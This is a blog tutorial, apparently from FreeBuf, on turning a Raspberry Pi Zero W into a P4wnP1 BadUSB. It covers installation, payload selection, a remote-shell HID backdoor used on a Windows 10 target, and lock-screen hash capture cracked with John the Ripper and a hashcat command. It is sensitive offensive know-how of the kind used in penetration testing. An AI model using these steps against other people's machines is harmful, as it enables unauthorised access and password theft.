Those who see the title may think that physical hacking is like this.
Of course, today is not about that kind of thing~
When we were young, we might have seen in movies, a big hacker pulled out a USB drive and typed away, and suddenly a certain big boss’s computer was unlocked. At that moment, did everyone wonder if one day I could do that too?
This kind of USB drive is called badusb, and there are finished products made by foreign teams online (Bash Bunny), but the price is really touching…
So the question arises, as a geek (basic) machine guy, naturally, we want to complete it at the lowest cost. So I discovered the open-source project P4wnP1.
P4wnP1 is a highly customizable USB attack platform, based on a low-cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).
P4wnP1 is a highly customizable USB attack platform, based on a low-cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).
Without further ado, let’s get straight to the point!
What You Need
Raspberry Pi Pi Zero W (you can find Zero, Zero W, Zero WH on Taobao, since we only need Bluetooth and Wi-Fi, we choose Zero W)
A microSD (TF) card (8G is enough, larger is also fine)
USB expansion board [optional] (this way you can directly plug in USB for data connection, if you don’t want to buy it, you can also use a micro USB data cable)
System: There is a pit here, I encountered problems when installing the latest image system (Wi-Fi cannot be configured and connected)… So I chose the 2017 version of Raspbian Jessie. Download link: click to download. After downloading, unzip the zip file to get the img file.
Installation
Hardware Installation
Since I find it troublesome, I directly bought the USB expansion version. Here is the finished product after installation~
System Installation
Software used: win32diskimager or rufus-3.4, both are fine, here is a download link for rufus. Rufus download link
Similarly, taking rufus as an example, insert the TF card into the computer with a card reader, open rufus, select the guide file as the image file we downloaded, and click start.
It takes about 5 minutes for the image to be written.
Wi-Fi Configuration
Note: Pi Zero W only supports 2.4G frequency!
After writing the image, we need to configure the network connection of the Raspberry Pi. We open the boot partition and create a wpa_supplicant.conf and ssh file (note that the ssh file has no suffix).
In the wpa_supplicant.conf file, write your network configuration (this step is to ensure that your computer and Raspberry Pi are on the same network so that you can connect via ssh), the configuration format is as follows:
network={
ssid="WiFi_name"
psk="mypassword"
key_mgmt=WPA-PSK
priority=1
}
network={
ssid="WiFi_name2"
psk="password"
key_mgmt=WPA-PSK
priority=2
scan_ssid=1
}Explanation of the above Wi-Fi configuration names:
ssid - wifi name
psk - wifi password
key_mgmt - if your wifi encryption method is WPA/WPA2, this type is WPA-PSK, if it is WEP encryption or no password, it is NONE.
priority - wifi priority, if you are worried that a certain Wi-Fi cannot connect, you can configure multiple wifi, and the Raspberry Pi will connect according to priority.
scan_ssid - if your wifi is hidden, you need to set this value to 1After configuring Wi-Fi, we also need to create an empty file named ssh in the root directory (remember, it has no suffix), after configuration, it should look like the image below.
After completing the above work, we can insert the TF card into the Raspberry Pi and then connect it to the computer.
SSH Connection to Raspberry Pi
When we plug in the USB, wait for 1-2 minutes, we can find a device named raspberrypi on the router management interface, find its IP, and record it.
Next, we use putty to connect via ssh, other ssh software can also be used, I will take PUTTY as an example:
Fill in the address of the Raspberry Pi and then connect. The account is pi and the password is raspberry.
Configuring and Installing P4wnP1
It is recommended to change the source after connecting, so it will be faster (for domestic users)
Method to modify the source:
sudo nano /etc/apt/sources.list
Change deb xxxxx to
deb http://mirrors.aliyun.com/raspbian/raspbian/ stretch main contrib non-free rpi
ctrl+o to save, ctrl+x to exitConfiguring Environment
sudo apt-get update
sudo apt-get install git john
git clone --recursive http://github.com/mame82/P4wnP1After cloning, execute the following operations
cd P4wnP1/
./install.shYou will have to wait a long time… During the installation, there may be some installation inquiries, just execute according to the default situation.
When this interface appears, it means the installation was successful!
Usage
After completing the above steps, plug the Raspberry Pi into the computer you want to hack (here, I use a Windows 10 desktop as the target machine).
Connect to a Wi-Fi named P4wnP1, the initial password is: MaMe82-P4wnP1.
After successfully connecting, we open PUTTY, connect to: 172.24.0.1 port 22, the account password is still the Raspberry Pi’s password.
After entering successfully, some will directly enter the following interface.
We can enter the installation path of P4WNP1 and find setup.cfg to change the payloads:
sudo nano /P4wnP1/setup.cfgThere are many configurations in setup.cfg, you can modify some according to your needs. There may be some configuration issues here, you can scroll to the bottom to see the solution.
Changing Payloads
To change payloads, you need to go to the program’s installation directory to make changes, but there may be some issues. I once installed it, and its installation directory changed to another location, but in the following installations, its installation directory remained in the current directory. If you encounter a situation where the installation path cannot be found, you can try the following command.
sudo find -name P4wnP1After entering the installation directory, modify setup.cfg.
sudo nano /P4wnP1/setup.cfgScroll to the bottom and find Payload selection:
There are many payloads starting with #, which means they are not being used. This project can only load one payload at a time, so if you choose network_only, you cannot select other payloads. Here we take hid_backdoor_remote.txt as an example.
First, add a # before network_only, and remove the # before backdoor_remote.
Save and exit. You can directly reboot or unplug and reinsert the data cable.
When we connect again, if the following situation occurs, it means the change was successful, and you can start doing things~
Practical (Taking hid_backdoor_remote as an example)
When entering the P4wnP1 shell, we need to first enter FireStage1, which connects to the target machine. When the words “client connect” appear, it means the connection is successful.
P.S: You can enter help to see the available commands.
Here, taking shell as an example, we enter shell
You can see that we are operating as the current host.
If you want to exit shell mode, press Ctrl+C to exit.
Below are explanations of some commands
SendDuckyScript sends keyboard scripts
SendMouseScript sends mouse scripts
download downloads files to the Raspberry Pi
upload uploads files to the host
shell accesses the console as the target machine
CreateProc creates a process (the command to open Notepad is: CreateProc notepad)
sendkeys xxx sends keyboard input ‘xxx’
Many other command explanations can be found in the official manual.
Cracking Passwords on Windows 10
This is a particularly interesting point on P4wnP1. However, after my personal testing, there are indeed some limitations.
To put it simply, the principle is to insert the device, and when entering the password into the system interface, the Raspberry Pi captures the hash value with the password, and then brute-forces it one by one for comparison… Simple letters like abc, 123 are indeed very fast, but if the password is a combination of letters + numbers or is long and complex, it may take a long time to crack.
If the password is weak
After setting the payloads, insert it into the computer. After the victim enters the password, the Raspberry Pi will use the John the Ripper module to crack it, which the author mentioned in the documentation.
You leave P4wnP1 plugged and the hashes are handed over to John the Ripper, which tries to bruteforce the captured hash.
If the password of the user who locked the box is weakly chosen, chances are high that John the Ripper is able to crack it, which leads to…
For example, if the password on my target machine is abc, when the Raspberry Pi is plugged in, wait for a while, and enter the password to access the Windows system, at this time we connect to the Raspberry Pi’s hotspot with another machine. Execute the following command
cd /P4wnP1/collected
lsThe collected folder stores the intercepted hash values. If it is a weak password, a .hashes.cracked will be generated later, and we can directly view it to obtain the password.
If the password is strong and you know the composition of the password
Here I recommend a tool called hashcat: download link, it requires GPU for computation.
Take the hash value we obtained and execute it with the following command
hashcat64.exe -m 5600 hash.txt -a 3 ?d?d?d?d?d?l?lLet me explain the command above, hash.txt is the content of the .hashes file. The question marks represent the range of values for different positions of the password. For example, in the above example, the first five positions of the password are numbers, and the last two positions are letters.
For detailed explanation, you can check this: click me
Conducting Penetration Testing on Mobile
Recommended two apps
Android: JuiceSSH
Apple: shelly
Problems Encountered
If You Really Find the Installation Process Troublesome
The author provides a packaged system image that can be directly written to the TF card.
Download link
SSH Connection Issues
If you encounter SSH refusal to connect, first think about whether you created the ssh file after configuring Wi-Fi. If you created it but still cannot connect, you can restart the router to see if there is a problem with the router’s record (this situation may occur if you originally used this Raspberry Pi to install the system, but you reinstalled the system and caused it to be unconnected). If it still doesn’t work, reinstall the system.
Wi-Fi Name Setting Issues
“Why did I modify the Wi-Fi name in setup.cfg but the one loaded is not the one I modified?”.
This is because when loading the payload, the project will first load some configurations from the payload, and the payload settings are the defaults from the original setup.cfg. How to modify? Comment out the corresponding options in the payload, as long as the program finds that the payload is missing some option configurations (such as Wi-Fi name, password, etc.), the program will automatically supplement the missing options from setup.cfg.
Raspberry Pi Not in Hotspot Mode, Still Connected as Wi-Fi
sudo -i
nano /etc/network/interfacesJust delete the part framed in the image 
Connected Successfully, But Main Program Shell Interface Does Not Pop Up
On the target machine, try to select the 3.0 interface, as I sometimes encounter this situation using 2.0.
Windows 10 Password Cracking Mode Cannot Obtain Hash Value
I plugged in the Raspberry Pi while in the lock screen state, waited for a while before entering. Sometimes there will be a certain delay, or it may not capture the hash value at all. In this case, it is best to clear the contents of the collected folder, then log out of the target machine and try again.
Reference Documents
P4wnP1
P4wnP1_Official_Wiki
hashcat
How to Turn Your Raspberry Pi into a “Penetration Testing Tool”
Snag Windows Passwords With Pi Zero | P4wnp1
*Author of this article: Milu. This article belongs to the FreeBuf original reward plan, and is prohibited from being reproduced without permission.
